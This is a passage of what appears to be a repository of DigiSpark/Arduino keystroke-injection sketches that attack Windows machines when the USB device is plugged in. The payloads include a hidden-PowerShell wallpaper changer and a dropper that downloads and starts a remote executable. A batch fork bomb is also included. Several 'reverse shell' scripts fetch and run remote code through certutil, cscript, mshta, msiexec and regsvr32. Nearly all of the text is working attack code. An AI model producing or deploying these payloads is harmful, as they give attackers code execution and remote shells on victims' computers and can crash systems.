3 | void setup() {
4 | pinMode(1, OUTPUT);
5 | }
6 | void loop() {
7 | DigiKeyboard.delay(3000);
8 | DigiKeyboard.sendKeyStroke(0);
9 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
10 | DigiKeyboard.delay(300);
11 | DigiKeyboard.print("powershell -windowstyle hidden");
12 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
13 | DigiKeyboard.delay(1000);
14 | DigiKeyboard.print("iwr -Uri URL -OutFile C:/windows/temp/b.jpg;sp 'HKCU:Control Panel/Desktop' WallPaper 'C:/windows/temp/b.jpg';RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 5");
15 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
16 | digitalWrite(1, HIGH);
17 | DigiKeyboard.delay(90000);
18 | digitalWrite(1, LOW);
19 | DigiKeyboard.delay(5000);
20 | }
21 |
--------------------------------------------------------------------------------
/scripts/windows/misc/dropper.ino:
--------------------------------------------------------------------------------
1 | #include "DigiKeyboard.h"
2 | void setup() {
3 | pinMode(1, OUTPUT);
4 | }
5 | void loop() {
6 | DigiKeyboard.delay(5000);
7 | DigiKeyboard.sendKeyStroke(0);
8 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
9 | DigiKeyboard.delay(300);
10 | DigiKeyboard.print("powershell -windowstyle hidden");
11 | DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT + MOD_SHIFT_LEFT);
12 | DigiKeyboard.delay(500);
13 | DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
14 | DigiKeyboard.delay(100);
15 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
16 | DigiKeyboard.delay(1000);
17 | DigiKeyboard.print("$source = \"http://HOST:PORT/FILENAME\"; $destination = \"C:/FILENAME\"; Invoke-WebRequest $source -OutFile $destination;");
18 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
19 | DigiKeyboard.delay(5000);
20 | DigiKeyboard.print("start-process C:/FILENAME");
21 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
22 | digitalWrite(1, HIGH);
23 | DigiKeyboard.delay(90000);
24 | digitalWrite(1, LOW);
25 | DigiKeyboard.delay(5000);
26 | }
27 |
--------------------------------------------------------------------------------
/scripts/windows/misc/fork_bomb.ino:
--------------------------------------------------------------------------------
1 | #include "DigiKeyboard.h"
2 | void setup() {
3 | pinMode(1, OUTPUT);
4 | }
5 | void loop() {
6 | DigiKeyboard.delay(5000);
7 | DigiKeyboard.sendKeyStroke(0);
8 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
9 | DigiKeyboard.delay(300);
10 | DigiKeyboard.print("cmd");
11 | DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT + MOD_SHIFT_LEFT);
12 | DigiKeyboard.delay(500);
13 | DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
14 | DigiKeyboard.delay(100);
15 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
16 | DigiKeyboard.delay(500);
17 | DigiKeyboard.print("cd %temp%");
18 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
19 | DigiKeyboard.print("copy con fu.bat");
20 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
21 | DigiKeyboard.print("@echo off");
22 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
23 | DigiKeyboard.print(":START");
24 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
25 | DigiKeyboard.print("cmd /C ""\"start /MIN fu.bat\"""");
26 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
27 | DigiKeyboard.print("GOTO START");
28 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
29 | DigiKeyboard.sendKeyStroke(KEY_C, MOD_CONTROL_LEFT);
30 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
31 | DigiKeyboard.print("cmd /C ""\"start /MIN fu.bat\"""");
32 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
33 | DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT);
34 | digitalWrite(1, HIGH);
35 | DigiKeyboard.delay(90000);
36 | digitalWrite(1, LOW);
37 | DigiKeyboard.delay(5000);
38 | }
39 |
--------------------------------------------------------------------------------
/scripts/windows/reverse_shell/certutil_reverse_shell.ino:
--------------------------------------------------------------------------------
1 | // Author : thewhiteh4t //
2 | #include "DigiKeyboard.h"
3 | void setup() {
4 | pinMode(1, OUTPUT);
5 | }
6 | void loop() {
7 | DigiKeyboard.delay(5000);
8 | DigiKeyboard.sendKeyStroke(0);
9 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
10 | DigiKeyboard.delay(300);
11 | DigiKeyboard.print("cmd");
12 | DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT + MOD_SHIFT_LEFT);
13 | DigiKeyboard.delay(500);
14 | DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
15 | DigiKeyboard.delay(100);
16 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
17 | DigiKeyboard.delay(300);
18 | DigiKeyboard.print("certutil.exe -urlcache -split -f http://LHOST:PHPPORT/FILENAME.exe FILENAME.exe & FILENAME.exe");
19 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
20 | DigiKeyboard.delay(1200);
21 | DigiKeyboard.print("exit");
22 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
23 | digitalWrite(1, HIGH);
24 | DigiKeyboard.delay(90000);
25 | digitalWrite(1, LOW);
26 | DigiKeyboard.delay(5000);
27 | }
28 |
--------------------------------------------------------------------------------
/scripts/windows/reverse_shell/cscript_reverse_shell.ino:
--------------------------------------------------------------------------------
1 | // AUthor : thewhiteh4t //
2 | #include "DigiKeyboard.h"
3 | void setup() {
4 | pinMode(1, OUTPUT);
5 | }
6 | void loop() {
7 | DigiKeyboard.delay(5000);
8 | DigiKeyboard.sendKeyStroke(0);
9 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
10 | DigiKeyboard.delay(300);
11 | DigiKeyboard.print("cmd");
12 | DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT + MOD_SHIFT_LEFT);
13 | DigiKeyboard.delay(500);
14 | DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
15 | DigiKeyboard.delay(100);
16 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
17 | DigiKeyboard.delay(300);
18 | DigiKeyboard.print("powershell.exe -c ""(New-Object System.NET.WebClient).DownloadFile('http://LHOST:PHPPORT/FILENAME.vbs',\\""\"$env:temp\\FILENAME.vbs\\\""");Start-Process %windir%\\system32\\cscript.exe \\""\"$env:temp\\FILENAME.vbs\\\""" """);
19 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
20 | DigiKeyboard.delay(1000);
21 | DigiKeyboard.sendKeyStroke(KEY_C, MOD_CONTROL_LEFT);
22 | DigiKeyboard.delay(100);
23 | DigiKeyboard.print("exit");
24 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
25 | digitalWrite(1, HIGH);
26 | DigiKeyboard.delay(90000);
27 | digitalWrite(1, LOW);
28 | DigiKeyboard.delay(5000);
29 | }
30 |
--------------------------------------------------------------------------------
/scripts/windows/reverse_shell/hta_reverse_shell.ino:
--------------------------------------------------------------------------------
1 | // Author : thewhiteh4t //
2 | #include "DigiKeyboard.h"
3 | void setup() {
4 | pinMode(1, OUTPUT);
5 | }
6 | void loop() {
7 | DigiKeyboard.delay(5000);
8 | DigiKeyboard.sendKeyStroke(0);
9 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
10 | DigiKeyboard.delay(300);
11 | DigiKeyboard.print("powershell -windowstyle hidden");
12 | DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT + MOD_SHIFT_LEFT);
13 | DigiKeyboard.delay(500);
14 | DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
15 | DigiKeyboard.delay(100);
16 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
17 | DigiKeyboard.delay(1000);
18 | DigiKeyboard.print("mshta.exe http://192.168.0.107:8080/system.hta");
19 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
20 | digitalWrite(1, HIGH);
21 | DigiKeyboard.delay(90000);
22 | digitalWrite(1, LOW);
23 | DigiKeyboard.delay(5000);
24 | }
25 |
--------------------------------------------------------------------------------
/scripts/windows/reverse_shell/msiexec_reverse_shell.ino:
--------------------------------------------------------------------------------
1 | // Author : thewhiteh4t //
2 | #include "DigiKeyboard.h"
3 | void setup() {
4 | pinMode(1, OUTPUT);
5 | }
6 | void loop() {
7 | DigiKeyboard.delay(5000);
8 | DigiKeyboard.sendKeyStroke(0);
9 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
10 | DigiKeyboard.delay(300);
11 | DigiKeyboard.print("cmd");
12 | DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT + MOD_SHIFT_LEFT);
13 | DigiKeyboard.delay(500);
14 | DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
15 | DigiKeyboard.delay(100);
16 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
17 | DigiKeyboard.delay(300);
18 | DigiKeyboard.print("msiexec /q /i http://LHOST:PHPPORT/FILENAME.msi");
19 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
20 | DigiKeyboard.delay(100);
21 | DigiKeyboard.print("exit");
22 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
23 | digitalWrite(1, HIGH);
24 | DigiKeyboard.delay(90000);
25 | digitalWrite(1, LOW);
26 | DigiKeyboard.delay(5000);
27 | }
28 |
--------------------------------------------------------------------------------
/scripts/windows/reverse_shell/regsvr32_reverse_shell.ino:
--------------------------------------------------------------------------------
1 | // Author : thewhiteh4t //
2 | #include "DigiKeyboard.h"
3 | void setup() {
4 | pinMode(1, OUTPUT);
5 | }
6 | void loop() {
7 | DigiKeyboard.delay(5000);
8 | DigiKeyboard.sendKeyStroke(0);
9 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
10 | DigiKeyboard.delay(300);
11 | DigiKeyboard.print("regsvr32 /s /n /u /i:http://SRVHOST:SRVPORT/FILENAME.sct scrobj.dll");
12 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
13 | digitalWrite(1, HIGH);
14 | DigiKeyboard.delay(90000);
15 | digitalWrite(1, LOW);
16 | DigiKeyboard.delay(5000);
17 | }
--------------------------------------------------------------------------------